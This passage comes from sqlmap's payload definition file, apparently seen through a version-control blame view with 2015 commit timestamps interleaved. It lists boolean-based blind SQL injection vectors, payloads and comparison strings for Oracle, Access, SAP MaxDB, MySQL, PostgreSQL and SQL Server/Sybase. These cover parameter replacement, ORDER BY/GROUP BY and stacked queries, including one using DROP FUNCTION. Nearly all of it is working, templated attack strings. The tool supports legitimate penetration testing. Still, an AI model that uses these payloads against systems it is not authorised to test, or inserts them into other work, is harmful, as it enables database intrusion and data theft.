<title > Oracle boolean-based blind - Parameter replace (original value)</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,3</clause>
<where > 3</where>
2015-02-18 13:13:44 +03:00
<vector > (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
<request >
<payload > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
</request>
<response >
<comparison > (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
2015-02-20 14:34:16 +03:00
<title > Microsoft Access boolean-based blind - Parameter replace</title>
2015-02-18 13:13:44 +03:00
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,3</clause>
<where > 3</where>
2015-02-20 14:34:16 +03:00
<vector > IIF([INFERENCE],[RANDNUM],1/0)</vector>
<request >
<payload > IIF([RANDNUM]=[RANDNUM],[RANDNUM],1/0)</payload>
</request>
<response >
<comparison > IIF([RANDNUM]=[RANDNUM1],[RANDNUM],1/0)</comparison>
</response>
<details >
<dbms > Microsoft Access</dbms>
</details>
</test>
<test >
<title > Microsoft Access boolean-based blind - Parameter replace (original value)</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,3</clause>
<where > 3</where>
2015-02-18 13:13:44 +03:00
<vector > IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
<request >
<payload > IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
</request>
<response >
<comparison > IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>
</response>
<details >
<dbms > Microsoft Access</dbms>
</details>
</test>
<test >
2015-02-20 14:34:16 +03:00
<title > SAP MaxDB boolean-based blind - Parameter replace</title>
2015-02-18 13:13:44 +03:00
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,3</clause>
<where > 3</where>
2015-02-20 14:34:16 +03:00
<vector > (CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END)</vector>
<request >
<payload > (CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END)</payload>
</request>
<response >
<comparison > (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END)</comparison>
</response>
<details >
<dbms > SAP MaxDB</dbms>
</details>
</test>
<test >
<title > SAP MaxDB boolean-based blind - Parameter replace (original value)</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,3</clause>
<where > 3</where>
2015-02-18 13:13:44 +03:00
<vector > (CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
<request >
<payload > (CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
</request>
<response >
<comparison > (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
</response>
<details >
<dbms > SAP MaxDB</dbms>
</details>
</test>
<!-- End of boolean - based blind tests - Parameter replace -->
2015-02-20 21:34:23 +03:00
<!-- Boolean - based blind tests - ORDER BY, GROUP BY clause -->
2015-02-18 13:13:44 +03:00
<test >
2015-02-20 21:34:23 +03:00
<title > MySQL > = 5.0 boolean-based blind - ORDER BY, GROUP BY clause</title>
2015-02-18 13:13:44 +03:00
<stype > 1</stype>
2015-02-20 14:34:16 +03:00
<level > 2</level>
2015-02-18 13:13:44 +03:00
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
2015-02-19 19:42:26 +03:00
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
</request>
<response >
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.0</dbms_version>
</details>
</test>
<test >
2015-02-20 21:34:23 +03:00
<title > MySQL > = 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>
2015-02-19 19:42:26 +03:00
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 3</level>
2015-02-19 19:42:26 +03:00
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
2015-02-18 13:13:44 +03:00
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
</request>
<response >
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.0</dbms_version>
</details>
</test>
<test >
2015-02-20 21:34:23 +03:00
<title > MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause</title>
2015-02-18 13:13:44 +03:00
<stype > 1</stype>
2015-02-20 14:34:16 +03:00
<level > 3</level>
2015-02-18 13:13:44 +03:00
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
2015-02-19 19:42:26 +03:00
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
</request>
<response >
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
</response>
<details >
<dbms > MySQL</dbms>
2015-02-20 21:34:23 +03:00
<dbms_version > < 5.0</dbms_version>
2015-02-19 19:42:26 +03:00
</details>
</test>
<test >
2015-02-20 21:34:23 +03:00
<title > MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>
2015-02-19 19:42:26 +03:00
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 4</level>
2015-02-19 19:42:26 +03:00
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
2015-02-18 13:13:44 +03:00
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
</request>
<response >
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
</response>
<details >
<dbms > MySQL</dbms>
2015-02-20 21:34:23 +03:00
<dbms_version > < 5.0</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
2015-02-19 19:42:26 +03:00
<test >
2015-02-20 21:34:23 +03:00
<title > PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause</title>
2015-02-19 19:42:26 +03:00
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 2</level>
2015-02-19 19:42:26 +03:00
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END))</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END))</payload>
</request>
<response >
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))</comparison>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<!-- It exclusively works with ORDER BY -->
<test >
2015-02-20 21:34:23 +03:00
<title > PostgreSQL boolean-based blind - ORDER BY clause (original value)</title>
2015-02-19 19:42:26 +03:00
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 4</level>
2015-02-19 19:42:26 +03:00
<risk > 1</risk>
<clause > 3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>
</request>
<response >
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<!--
TODO: this would work for GROUP BY too if sqlmap did not enclose string-based [ORIGVALUE] with single quotes, but then other payloads would break.
It already works for ORDER BY because it accepts int whereas GROUP BY only accepts format [table].[column] so [ORIGVALUE] must where it is
-->
<test >
2015-02-20 21:34:23 +03:00
<!-- <title>PostgreSQL boolean - based blind - ORDER BY, GROUP BY clause (GENERATE_SERIES - original value)</title> -->
2015-02-20 14:34:16 +03:00
<title > PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES)</title>
2015-02-19 19:42:26 +03:00
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 5</level>
2015-02-19 19:42:26 +03:00
<risk > 1</risk>
<!-- <clause>2,3</clause> -->
<clause > 3</clause>
<where > 1</where>
2015-02-20 14:34:16 +03:00
<vector > ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
2015-02-19 19:42:26 +03:00
<request >
2015-02-20 14:34:16 +03:00
<payload > ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
2015-02-19 19:42:26 +03:00
</request>
<response >
2015-02-20 14:34:16 +03:00
<comparison > ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>
2015-02-19 19:42:26 +03:00
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
2015-02-18 13:13:44 +03:00
<test >
<title > Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause</title>
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 3</clause>
<where > 1</where>
2015-02-19 19:42:26 +03:00
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
</request>
<response >
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
<title > Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value)</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 3</clause>
<where > 1</where>
2015-02-18 13:13:44 +03:00
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
</request>
<response >
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
2015-02-20 21:34:23 +03:00
<title > Oracle boolean-based blind - ORDER BY, GROUP BY clause</title>
2015-02-18 13:13:44 +03:00
<stype > 1</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
2015-02-19 19:42:26 +03:00
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
</request>
<response >
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
2015-02-20 21:34:23 +03:00
<title > Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>
2015-02-19 19:42:26 +03:00
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
2015-02-18 13:13:44 +03:00
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
</request>
<response >
<comparison > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
2015-02-20 21:34:23 +03:00
<title > Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause</title>
2015-02-18 13:13:44 +03:00
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 4</level>
2015-02-18 13:13:44 +03:00
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
2015-02-19 19:42:26 +03:00
<vector > ,IIF([INFERENCE],1,1/0)</vector>
<request >
<payload > ,IIF([RANDNUM]=[RANDNUM],1,1/0)</payload>
</request>
<response >
<comparison > ,IIF([RANDNUM]=[RANDNUM1],1,1/0)</comparison>
</response>
<details >
<dbms > Microsoft Access</dbms>
</details>
</test>
<test >
2015-02-20 21:34:23 +03:00
<title > Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>
2015-02-19 19:42:26 +03:00
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 5</level>
2015-02-19 19:42:26 +03:00
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
2015-02-18 13:13:44 +03:00
<vector > ,IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
<request >
<payload > ,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
</request>
<response >
<comparison > ,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>
</response>
<details >
<dbms > Microsoft Access</dbms>
</details>
</test>
2015-02-19 19:42:26 +03:00
<test >
2015-02-20 21:34:23 +03:00
<title > SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause</title>
2015-02-19 19:42:26 +03:00
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 4</level>
2015-02-19 19:42:26 +03:00
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(CASE WHEN [INFERENCE] THEN 1 ELSE NULL END)</vector>
<request >
<payload > ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END)</payload>
</request>
<response >
<comparison > ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END)</comparison>
</response>
<details >
<dbms > SAP MaxDB</dbms>
</details>
</test>
<test >
2015-02-20 21:34:23 +03:00
<title > SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>
2015-02-19 19:42:26 +03:00
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 5</level>
2015-02-19 19:42:26 +03:00
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
<request >
<payload > ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
</request>
<response >
<comparison > ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
</response>
<details >
<dbms > SAP MaxDB</dbms>
</details>
</test>
2015-02-20 21:34:23 +03:00
<!-- End of boolean - based blind tests - ORDER BY, GROUP BY clause -->
2015-02-18 13:13:44 +03:00
2015-02-19 19:42:26 +03:00
<!-- Boolean - based blind tests - Stacked queries -->
2015-02-18 13:13:44 +03:00
<test >
2015-02-19 19:42:26 +03:00
<title > MySQL > = 5.0 boolean-based blind - Stacked queries</title>
2015-02-18 13:13:44 +03:00
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 4</level>
2015-02-19 19:42:26 +03:00
<risk > 1</risk>
2015-02-18 13:13:44 +03:00
<clause > 0</clause>
2015-02-19 19:42:26 +03:00
<where > 1</where>
2015-02-20 14:34:16 +03:00
<vector > ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)</vector>
2015-02-19 19:42:26 +03:00
<request >
2015-02-20 14:34:16 +03:00
<payload > ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)</payload>
2015-02-19 19:42:26 +03:00
<comment > #</comment>
</request>
<response >
2015-02-20 14:34:16 +03:00
<comparison > ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)</comparison>
2015-02-19 19:42:26 +03:00
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.0</dbms_version>
</details>
</test>
<test >
<title > MySQL < 5.0 boolean-based blind - Stacked queries</title>
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 5</level>
2015-02-19 19:42:26 +03:00
<risk > 1</risk>
<clause > 0</clause>
<where > 1</where>
2015-02-20 14:34:16 +03:00
<vector > ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)</vector>
2015-02-19 19:42:26 +03:00
<request >
2015-02-20 14:34:16 +03:00
<payload > ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)</payload>
2015-02-19 19:42:26 +03:00
<comment > #</comment>
</request>
<response >
2015-02-20 14:34:16 +03:00
<comparison > ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)</comparison>
2015-02-19 19:42:26 +03:00
</response>
<details >
<dbms > MySQL</dbms>
2015-02-20 21:34:23 +03:00
<dbms_version > < 5.0</dbms_version>
2015-02-19 19:42:26 +03:00
</details>
</test>
<test >
<title > PostgreSQL boolean-based blind - Stacked queries</title>
<stype > 1</stype>
2015-02-20 14:34:16 +03:00
<level > 3</level>
2015-02-19 19:42:26 +03:00
<risk > 1</risk>
<clause > 0</clause>
<where > 1</where>
<vector > ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-19 19:42:26 +03:00
<payload > ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</payload>
2015-02-18 13:13:44 +03:00
<comment > --</comment>
</request>
<response >
2015-02-19 19:42:26 +03:00
<comparison > ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</comparison>
2015-02-18 13:13:44 +03:00
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
2015-02-20 14:34:16 +03:00
<!-- Because of the syntax of GENERATE_SERIES() function, the 'then' condition must be 1, do not change it -->
2015-02-18 13:13:44 +03:00
<test >
2015-02-20 14:34:16 +03:00
<title > PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES)</title>
2015-02-18 13:13:44 +03:00
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 5</level>
2015-02-20 14:34:16 +03:00
<risk > 1</risk>
<clause > 0</clause>
<where > 1</where>
<vector > ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1</vector>
<request >
<payload > ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1</payload>
<comment > --</comment>
</request>
<response >
<comparison > ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1</comparison>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<test >
<title > Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)</title>
<stype > 1</stype>
<level > 3</level>
2015-02-19 19:42:26 +03:00
<risk > 1</risk>
2015-02-18 13:13:44 +03:00
<clause > 0</clause>
<where > 1</where>
2015-02-19 19:42:26 +03:00
<vector > ;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-19 19:42:26 +03:00
<payload > ;IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</payload>
2015-02-18 13:13:44 +03:00
<comment > --</comment>
</request>
<response >
2015-02-19 19:42:26 +03:00
<comparison > ;IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</comparison>
2015-02-18 13:13:44 +03:00
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
2015-02-20 14:34:16 +03:00
<test >
<title > Microsoft SQL Server/Sybase boolean-based blind - Stacked queries</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 0</clause>
<where > 1</where>
<vector > ;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)</vector>
<request >
<payload > ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)</payload>
<comment > --</comment>
</request>
<response >
<comparison > ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)</comparison>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
<title > Oracle boolean-based blind - Stacked queries</title>
<stype > 1</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 0</clause>
<where > 1</where>
<vector > ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</vector>
<request >
<payload > ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</payload>
<comment > --</comment>
</request>
<response >
<comparison > ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</comparison>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
<title > Microsoft Access boolean-based blind - Stacked queries</title>
<stype > 1</stype>
2015-02-20 21:34:23 +03:00
<level > 5</level>
2015-02-20 14:34:16 +03:00
<risk > 1</risk>
<clause > 0</clause>
<where > 1</where>
<vector > ;IIF([INFERENCE],1,1/0)</vector>
<request >
<payload > ;IIF([RANDNUM]=[RANDNUM],1,1/0)</payload>
<comment > %16</comment>
</request>
<response >
<comparison > ;IIF([RANDNUM]=[RANDNUM1],1,1/0)</comparison>
</response>
<details >
<dbms > Microsoft Access</dbms>
</details>
</test>
<test >
<title > SAP MaxDB boolean-based blind - Stacked queries</title>
<stype > 1</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 0</clause>
<where > 1</where>
<vector > ;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END</vector>
<request >
<payload > ;SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END</payload>
<comment > --</comment>
</request>
<response >
<comparison > ;SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END</comparison>
</response>
<details >
<dbms > SAP MaxDB</dbms>
</details>
</test>
2015-02-19 19:42:26 +03:00
<!-- End of boolean - based blind tests - Stacked queries -->
2015-02-18 13:13:44 +03:00
</root>